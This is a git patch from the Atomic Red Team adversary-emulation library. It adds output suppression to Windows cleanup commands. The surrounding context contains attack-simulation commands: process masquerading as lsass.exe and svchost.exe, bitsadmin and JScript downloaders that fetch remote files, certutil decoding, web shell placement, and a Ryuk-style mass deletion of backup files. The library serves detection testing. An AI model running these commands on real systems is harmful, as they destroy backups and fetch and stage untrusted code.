From 2f778f359e04795e8b2a709540af03c562ada614 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 10 Mar 2020 23:06:25 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1036/T1036.md | 12 ++--- atomics/T1038/T1038.md | 4 +- atomics/T1055/T1055.md | 4 +- atomics/T1064/T1064.md | 2 +- atomics/T1071/T1071.md | 2 +- atomics/T1100/T1100.md | 2 +- atomics/T1102/T1102.md | 2 +- atomics/T1105/T1105.md | 4 +- atomics/T1107/T1107.md | 2 +- atomics/T1114/T1114.md | 2 +- atomics/T1115/T1115.md | 2 +- atomics/T1119/T1119.md | 8 +-- atomics/T1121/T1121.md | 6 +-- atomics/T1140/T1140.md | 8 +-- atomics/T1145/T1145.md | 2 +- atomics/T1158/T1158.md | 6 +-- atomics/T1197/T1197.md | 2 +- atomics/T1485/T1485.md | 2 +- atomics/T1500/T1500.md | 2 +- atomics/index.yaml | 110 ++++++++++++++++++++--------------------- 20 files changed, 92 insertions(+), 92 deletions(-) diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md index dd3b76b8f3..1a9da0c97d 100644 --- a/atomics/T1036/T1036.md +++ b/atomics/T1036/T1036.md @@ -54,7 +54,7 @@ cmd.exe /c %SystemRoot%\Temp\lsass.exe #### Cleanup Commands: ``` -del /Q /F %SystemRoot%\Temp\lsass.exe +del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 ``` @@ -100,7 +100,7 @@ cmd.exe /c %APPDATA%\notepad.exe /B #### Cleanup Commands: ``` -del /Q /F %APPDATA%\notepad.exe +del /Q /F %APPDATA%\notepad.exe >nul 2>&1 ``` @@ -125,7 +125,7 @@ cmd.exe /c %APPDATA%\svchost.exe /B #### Cleanup Commands: ``` -del /Q /F %APPDATA%\svchost.exe +del /Q /F %APPDATA%\svchost.exe >nul 2>&1 ``` @@ -150,7 +150,7 @@ cmd.exe /K %APPDATA%\taskhostw.exe #### Cleanup Commands: ``` -del /Q /F %APPDATA%\taskhostw.exe +del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 ``` @@ -252,8 +252,8 @@ C:\lsm.exe /c echo T1036 > C:\T1036.txt #### Cleanup Commands: ``` -del C:\T1036.txt -del C:\lsm.exe +del C:\T1036.txt >nul 2>&1 +del C:\lsm.exe >nul 2>&1 ``` diff --git a/atomics/T1038/T1038.md b/atomics/T1038/T1038.md index 8751b73115..4987667221 100644 --- a/atomics/T1038/T1038.md +++ b/atomics/T1038/T1038.md @@ -35,8 +35,8 @@ copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll #### Cleanup Commands: ``` -del %APPDATA%\updater.exe -del %APPDATA%\amsi.dll +del %APPDATA%\updater.exe >nul 2>&1 +del %APPDATA%\amsi.dll >nul 2>&1 ``` diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index 26f22c3a89..4dbe38695e 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -204,8 +204,8 @@ C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt #### Cleanup Commands: ``` -del C:\T1055.txt -del C:\svchost.exe +del C:\T1055.txt >nul 2>&1 +del C:\svchost.exe >nul 2>&1 ``` diff --git a/atomics/T1064/T1064.md b/atomics/T1064/T1064.md index c2118474a7..404857a37e 100644 --- a/atomics/T1064/T1064.md +++ b/atomics/T1064/T1064.md @@ -59,7 +59,7 @@ C:\Windows\system32\cmd.exe /Q /c #{script_to_create} #### Cleanup Commands: ``` -del #{script_to_create} +del #{script_to_create} >nul 2>&1 ``` diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md index bdcea45a00..f0f67bbeb5 100644 --- a/atomics/T1071/T1071.md +++ b/atomics/T1071/T1071.md @@ -253,7 +253,7 @@ cscript //E:Jscript #{script_file} #### Cleanup Commands: ``` -del #{script_file} /F /Q +del #{script_file} /F /Q >nul 2>&1 ``` diff --git a/atomics/T1100/T1100.md b/atomics/T1100/T1100.md index 930537fc49..0d8eac36b0 100644 --- a/atomics/T1100/T1100.md +++ b/atomics/T1100/T1100.md @@ -33,7 +33,7 @@ xcopy #{web_shells} #{web_shell_path} #### Cleanup Commands: ``` -del #{web_shell_path} +del #{web_shell_path} >nul 2>&1 ``` diff --git a/atomics/T1102/T1102.md b/atomics/T1102/T1102.md index fc70bc0064..889559e3f9 100644 --- a/atomics/T1102/T1102.md +++ b/atomics/T1102/T1102.md @@ -31,7 +31,7 @@ bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/ %TEMP%\bitsa #### Cleanup Commands: ``` -del %TEMP%\bitsadmindownload.html +del %TEMP%\bitsadmindownload.html >nul 2>&1 ``` diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index 49548f002f..3ba539ac14 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -331,8 +331,8 @@ OSTap copies itself in a specfic way to shares and secondary drives. This emulat pushd #{destination_path} echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js CScript.exe AtomicTestT1105.js //E:JScript -del AtomicTestT1105.js /Q -del AtomicTestFileT1105.js /Q +del AtomicTestT1105.js /Q >nul 2>&1 +del AtomicTestFileT1105.js /Q >nul 2>&1 popd ``` diff --git a/atomics/T1107/T1107.md b/atomics/T1107/T1107.md index e0772fdf7a..fb4a7a26bf 100644 --- a/atomics/T1107/T1107.md +++ b/atomics/T1107/T1107.md @@ -122,7 +122,7 @@ Delete a single file from the temporary directory using cmd.exe #### Attack Commands: Run with `command_prompt`! ``` echo "T1107" > %temp%\T1107.txt -del /f %temp%\T1107.txt +del /f %temp%\T1107.txt >nul 2>&1 ``` diff --git a/atomics/T1114/T1114.md b/atomics/T1114/T1114.md index a7fc8283bd..6244fec10c 100644 --- a/atomics/T1114/T1114.md +++ b/atomics/T1114/T1114.md @@ -38,7 +38,7 @@ powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox #### Cleanup Commands: ``` -del #{output_file} +del #{output_file} >nul 2>&1 ``` diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md index 4224b1afc3..a71389e1a3 100644 --- a/atomics/T1115/T1115.md +++ b/atomics/T1115/T1115.md @@ -35,7 +35,7 @@ clip < %temp%\T1115.txt #### Cleanup Commands: ``` -del %temp%\T1115.txt +del %temp%\T1115.txt >nul 2>&1 ``` diff --git a/atomics/T1119/T1119.md b/atomics/T1119/T1119.md index 296adfdf8e..c38f859821 100644 --- a/atomics/T1119/T1119.md +++ b/atomics/T1119/T1119.md @@ -103,10 +103,10 @@ tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt #### Cleanup Commands: ``` -del %TEMP%\T1119_1.txt >$null 2>&1 -del %TEMP%\T1119_2.txt >$null 2>&1 -del %TEMP%\T1119_3.txt >$null 2>&1 -del %TEMP%\T1119_4.txt >$null 2>&1 +del %TEMP%\T1119_1.txt >nul 2>&1 +del %TEMP%\T1119_2.txt >nul 2>&1 +del %TEMP%\T1119_3.txt >nul 2>&1 +del %TEMP%\T1119_4.txt >nul 2>&1 ``` diff --git a/atomics/T1121/T1121.md b/atomics/T1121/T1121.md index bf26e69f2e..991a7fc26e 100644 --- a/atomics/T1121/T1121.md +++ b/atomics/T1121/T1121.md @@ -34,7 +34,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name} #### Cleanup Commands: ``` -del #{file_name} +del #{file_name} >nul 2>&1 ``` @@ -80,8 +80,8 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name} #### Cleanup Commands: ``` -del #{file_name} >$null 2>&1 -del key.snk >$null 2>&1 +del #{file_name} >nul 2>&1 +del key.snk >nul 2>&1 ``` diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md index 87371059c9..c4bb49bcac 100644 --- a/atomics/T1140/T1140.md +++ b/atomics/T1140/T1140.md @@ -37,8 +37,8 @@ certutil -decode %temp%\T1140_calc.txt %temp%T1140_calc_decoded.exe #### Cleanup Commands: ``` -del %temp%\T1140_calc.txt -del %temp%T1140_calc_decoded.exe +del %temp%\T1140_calc.txt >nul 2>&1 +del %temp%T1140_calc_decoded.exe >nul 2>&1 ``` @@ -68,8 +68,8 @@ copy %windir%\system32\certutil.exe %temp%\tcm.tmp #### Cleanup Commands: ``` -del %temp%\tcm.tmp -del %temp%\T1140.txt +del %temp%\tcm.tmp >nul 2>&1 +del %temp%\T1140.txt >nul 2>&1 ``` diff --git a/atomics/T1145/T1145.md b/atomics/T1145/T1145.md index c7a7e42a31..0b738020a1 100644 --- a/atomics/T1145/T1145.md +++ b/atomics/T1145/T1145.md @@ -37,7 +37,7 @@ dir c:\ /b /s .key | findstr /e .key #### Cleanup Commands: ``` -del c:\Windows\cert.key +del c:\Windows\cert.key >nul 2>&1 ``` diff --git a/atomics/T1158/T1158.md b/atomics/T1158/T1158.md index 058727befc..077c764b97 100644 --- a/atomics/T1158/T1158.md +++ b/atomics/T1158/T1158.md @@ -100,7 +100,7 @@ attrib.exe +s %TEMP%\T1158.txt #### Cleanup Commands: ``` -del /A:S %TEMP%\T1158.txt +del /A:S %TEMP%\T1158.txt >nul 2>&1 ``` @@ -125,7 +125,7 @@ attrib.exe +h %TEMP%\T1158_hidden.txt #### Cleanup Commands: ``` -del /A:H %TEMP%\T1158_hidden.txt +del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1 ``` @@ -231,7 +231,7 @@ for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i #### Cleanup Commands: ``` -del #{file_name} +del #{file_name} >nul 2>&1 ``` diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md index 80b8f6f609..34fe0f9488 100644 --- a/atomics/T1197/T1197.md +++ b/atomics/T1197/T1197.md @@ -40,7 +40,7 @@ bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_fi #### Cleanup Commands: ``` -del #{local_file} +del #{local_file} >nul 2>&1 ``` diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md index 63b16db473..93f5d7f01e 100644 --- a/atomics/T1485/T1485.md +++ b/atomics/T1485/T1485.md @@ -167,7 +167,7 @@ Deletes backup files in a manner similar to Ryuk ransomware. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ``` -del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk +del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1 ``` diff --git a/atomics/T1500/T1500.md b/atomics/T1500/T1500.md index f229030c94..d5a1f8929f 100644 --- a/atomics/T1500/T1500.md +++ b/atomics/T1500/T1500.md @@ -32,7 +32,7 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{in #### Cleanup Commands: ``` -del #{output_file} +del #{output_file} >nul 2>&1 ``` diff --git a/atomics/index.yaml b/atomics/index.yaml index 92eebc52d9..9e21c8550b 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -773,7 +773,7 @@ persistence: #{local_file} ' - cleanup_command: 'del #{local_file} + cleanup_command: 'del #{local_file} >nul 2>&1 ' - name: Download & Execute via PowerShell BITS @@ -1356,8 +1356,8 @@ persistence: copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll %APPDATA%\updater.exe -Command exit cleanup_command: | - del %APPDATA%\updater.exe - del %APPDATA%\amsi.dll + del %APPDATA%\updater.exe >nul 2>&1 + del %APPDATA%\amsi.dll >nul 2>&1 T1519: technique: x_mitre_permissions_required: @@ -1622,7 +1622,7 @@ persistence: command: | echo T1158 > %TEMP%\T1158.txt attrib.exe +s %TEMP%\T1158.txt - cleanup_command: 'del /A:S %TEMP%\T1158.txt + cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1 ' - name: Create Windows Hidden File with Attrib @@ -1637,7 +1637,7 @@ persistence: command: | echo T1158_hidden > %TEMP%\T1158_hidden.txt attrib.exe +h %TEMP%\T1158_hidden.txt - cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt + cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1 ' - name: Hidden files @@ -1710,7 +1710,7 @@ persistence: echo "Normal Text." > #{file_name} echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename} for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i - cleanup_command: 'del #{file_name} + cleanup_command: 'del #{file_name} >nul 2>&1 ' - name: Create ADS PowerShell @@ -4967,7 +4967,7 @@ persistence: command: 'xcopy #{web_shells} #{web_shell_path} ' - cleanup_command: 'del #{web_shell_path} + cleanup_command: 'del #{web_shell_path} >nul 2>&1 ' T1084: @@ -5517,7 +5517,7 @@ defense-evasion: #{local_file} ' - cleanup_command: 'del #{local_file} + cleanup_command: 'del #{local_file} >nul 2>&1 ' - name: Download & Execute via PowerShell BITS @@ -6221,7 +6221,7 @@ defense-evasion: #{input_file} ' - cleanup_command: 'del #{output_file}' + cleanup_command: 'del #{output_file} >nul 2>&1' T1223: technique: x_mitre_data_sources: @@ -6737,8 +6737,8 @@ defense-evasion: copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll %APPDATA%\updater.exe -Command exit cleanup_command: | - del %APPDATA%\updater.exe - del %APPDATA%\amsi.dll + del %APPDATA%\updater.exe >nul 2>&1 + del %APPDATA%\amsi.dll >nul 2>&1 T1073: technique: x_mitre_data_sources: @@ -6883,8 +6883,8 @@ defense-evasion: certutil -encode #{executable} %temp%\T1140_calc.txt certutil -decode %temp%\T1140_calc.txt %temp%T1140_calc_decoded.exe cleanup_command: | - del %temp%\T1140_calc.txt - del %temp%T1140_calc_decoded.exe + del %temp%\T1140_calc.txt >nul 2>&1 + del %temp%T1140_calc_decoded.exe >nul 2>&1 - name: Certutil Rename and Decode description: 'Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) @@ -6904,8 +6904,8 @@ defense-evasion: copy %windir%\system32\certutil.exe %temp%\tcm.tmp %temp%\tcm.tmp -decode #{executable} %temp%\T1140.txt cleanup_command: | - del %temp%\tcm.tmp - del %temp%\T1140.txt + del %temp%\tcm.tmp >nul 2>&1 + del %temp%\T1140.txt >nul 2>&1 T1089: technique: x_mitre_data_sources: @@ -7427,7 +7427,7 @@ defense-evasion: elevation_required: false command: | echo "T1107" > %temp%\T1107.txt - del /f %temp%\T1107.txt + del /f %temp%\T1107.txt >nul 2>&1 - name: Delete an entire folder - Windows cmd description: 'Recursively delete the temporary directory and all files contained within it using cmd.exe @@ -8270,7 +8270,7 @@ defense-evasion: command: | echo T1158 > %TEMP%\T1158.txt attrib.exe +s %TEMP%\T1158.txt - cleanup_command: 'del /A:S %TEMP%\T1158.txt + cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1 ' - name: Create Windows Hidden File with Attrib @@ -8285,7 +8285,7 @@ defense-evasion: command: | echo T1158_hidden > %TEMP%\T1158_hidden.txt attrib.exe +h %TEMP%\T1158_hidden.txt - cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt + cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1 ' - name: Hidden files @@ -8358,7 +8358,7 @@ defense-evasion: echo "Normal Text." > #{file_name} echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename} for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i - cleanup_command: 'del #{file_name} + cleanup_command: 'del #{file_name} >nul 2>&1 ' - name: Create ADS PowerShell @@ -9368,7 +9368,7 @@ defense-evasion: command: | cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe cmd.exe /c %SystemRoot%\Temp\lsass.exe - cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe + cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 ' - name: Masquerading as Linux crond process. @@ -9397,7 +9397,7 @@ defense-evasion: command: | copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y cmd.exe /c %APPDATA%\notepad.exe /B - cleanup_command: 'del /Q /F %APPDATA%\notepad.exe + cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1 ' - name: Masquerading - wscript.exe running as svchost.exe @@ -9413,7 +9413,7 @@ defense-evasion: command: | copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y cmd.exe /c %APPDATA%\svchost.exe /B - cleanup_command: 'del /Q /F %APPDATA%\svchost.exe + cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1 ' - name: Masquerading - powershell.exe running as taskhostw.exe @@ -9429,7 +9429,7 @@ defense-evasion: command: | copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y cmd.exe /K %APPDATA%\taskhostw.exe - cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe + cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 ' - name: Masquerading - non-windows exe running as windows exe @@ -9504,8 +9504,8 @@ defense-evasion: copy C:\Windows\System32\cmd.exe C:\lsm.exe C:\lsm.exe /c echo T1036 > C:\T1036.txt cleanup_command: | - del C:\T1036.txt - del C:\lsm.exe + del C:\T1036.txt >nul 2>&1 + del C:\lsm.exe >nul 2>&1 T1112: technique: x_mitre_data_sources: @@ -10899,8 +10899,8 @@ defense-evasion: copy C:\Windows\System32\cmd.exe C:\svchost.exe C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt cleanup_command: | - del C:\T1055.txt - del C:\svchost.exe + del C:\T1055.txt >nul 2>&1 + del C:\svchost.exe >nul 2>&1 T1121: technique: x_mitre_data_sources: @@ -10990,7 +10990,7 @@ defense-evasion: command: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file} C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name} - cleanup_command: 'del #{file_name} + cleanup_command: 'del #{file_name} >nul 2>&1 ' - name: Regsvs Uninstall Method Call Test @@ -11027,8 +11027,8 @@ defense-evasion: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk #{source_file} C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name} cleanup_command: |- - del #{file_name} >$null 2>&1 - del key.snk >$null 2>&1 + del #{file_name} >nul 2>&1 + del key.snk >nul 2>&1 T1117: technique: x_mitre_data_sources: @@ -11587,7 +11587,7 @@ defense-evasion: command: "C:\\Windows\\system32\\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create}\nC:\\Windows\\system32\\cmd.exe /Q /c #{script_to_create} \n" - cleanup_command: 'del #{script_to_create} + cleanup_command: 'del #{script_to_create} >nul 2>&1 ' T1218: @@ -12484,7 +12484,7 @@ defense-evasion: %TEMP%\bitsadmindownload.html ' - cleanup_command: 'del %TEMP%\bitsadmindownload.html + cleanup_command: 'del %TEMP%\bitsadmindownload.html >nul 2>&1 ' - name: Reach out to C2 Pointer URLs via powershell @@ -13655,8 +13655,8 @@ privilege-escalation: copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll %APPDATA%\updater.exe -Command exit cleanup_command: | - del %APPDATA%\updater.exe - del %APPDATA%\amsi.dll + del %APPDATA%\updater.exe >nul 2>&1 + del %APPDATA%\amsi.dll >nul 2>&1 T1519: technique: x_mitre_permissions_required: @@ -14902,8 +14902,8 @@ privilege-escalation: copy C:\Windows\System32\cmd.exe C:\svchost.exe C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt cleanup_command: | - del C:\T1055.txt - del C:\svchost.exe + del C:\T1055.txt >nul 2>&1 + del C:\svchost.exe >nul 2>&1 T1053: technique: x_mitre_permissions_required: @@ -15608,7 +15608,7 @@ privilege-escalation: command: 'xcopy #{web_shells} #{web_shell_path} ' - cleanup_command: 'del #{web_shell_path} + cleanup_command: 'del #{web_shell_path} >nul 2>&1 ' impact: @@ -15893,7 +15893,7 @@ impact: name: command_prompt elevation_required: true command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* - c:\backup*.* c:\*.set c:\*.win c:\*.dsk + c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1 ' '': @@ -21071,7 +21071,7 @@ credential-access: command: | echo "ATOMICREDTEAM" > %windir%\cert.key dir c:\ /b /s .key | findstr /e .key - cleanup_command: 'del c:\Windows\cert.key + cleanup_command: 'del c:\Windows\cert.key >nul 2>&1 ' - name: Discover Private SSH Keys @@ -22704,7 +22704,7 @@ execution: command: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file} C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name} - cleanup_command: 'del #{file_name} + cleanup_command: 'del #{file_name} >nul 2>&1 ' - name: Regsvs Uninstall Method Call Test @@ -22741,8 +22741,8 @@ execution: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk #{source_file} C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name} cleanup_command: |- - del #{file_name} >$null 2>&1 - del key.snk >$null 2>&1 + del #{file_name} >nul 2>&1 + del key.snk >nul 2>&1 T1117: technique: x_mitre_data_sources: @@ -23362,7 +23362,7 @@ execution: command: "C:\\Windows\\system32\\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create}\nC:\\Windows\\system32\\cmd.exe /Q /c #{script_to_create} \n" - cleanup_command: 'del #{script_to_create} + cleanup_command: 'del #{script_to_create} >nul 2>&1 ' T1035: @@ -25853,8 +25853,8 @@ lateral-movement: pushd #{destination_path} echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js CScript.exe AtomicTestT1105.js //E:JScript - del AtomicTestT1105.js /Q - del AtomicTestFileT1105.js /Q + del AtomicTestT1105.js /Q >nul 2>&1 + del AtomicTestFileT1105.js /Q >nul 2>&1 popd T1077: technique: @@ -26375,10 +26375,10 @@ collection: wmic process list > %TEMP%\T1119_3.txt tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt cleanup_command: |- - del %TEMP%\T1119_1.txt >$null 2>&1 - del %TEMP%\T1119_2.txt >$null 2>&1 - del %TEMP%\T1119_3.txt >$null 2>&1 - del %TEMP%\T1119_4.txt >$null 2>&1 + del %TEMP%\T1119_1.txt >nul 2>&1 + del %TEMP%\T1119_2.txt >nul 2>&1 + del %TEMP%\T1119_3.txt >nul 2>&1 + del %TEMP%\T1119_4.txt >nul 2>&1 T1115: technique: x_mitre_data_sources: @@ -26437,7 +26437,7 @@ collection: dir | clip echo "T1115" > %temp%\T1115.txt clip < %temp%\T1115.txt - cleanup_command: 'del %temp%\T1115.txt + cleanup_command: 'del %temp%\T1115.txt >nul 2>&1 ' - name: PowerShell @@ -26752,7 +26752,7 @@ collection: -file #{output_file} ' - cleanup_command: 'del #{output_file} + cleanup_command: 'del #{output_file} >nul 2>&1 ' T1056: @@ -28230,8 +28230,8 @@ command-and-control: pushd #{destination_path} echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js CScript.exe AtomicTestT1105.js //E:JScript - del AtomicTestT1105.js /Q - del AtomicTestFileT1105.js /Q + del AtomicTestT1105.js /Q >nul 2>&1 + del AtomicTestFileT1105.js /Q >nul 2>&1 popd T1071: technique: @@ -28474,7 +28474,7 @@ command-and-control: command: | echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file} cscript //E:Jscript #{script_file} - cleanup_command: 'del #{script_file} /F /Q + cleanup_command: 'del #{script_file} /F /Q >nul 2>&1 ' T1032: @@ -28868,7 +28868,7 @@ command-and-control: %TEMP%\bitsadmindownload.html ' - cleanup_command: 'del %TEMP%\bitsadmindownload.html + cleanup_command: 'del %TEMP%\bitsadmindownload.html >nul 2>&1 ' - name: Reach out to C2 Pointer URLs via powershell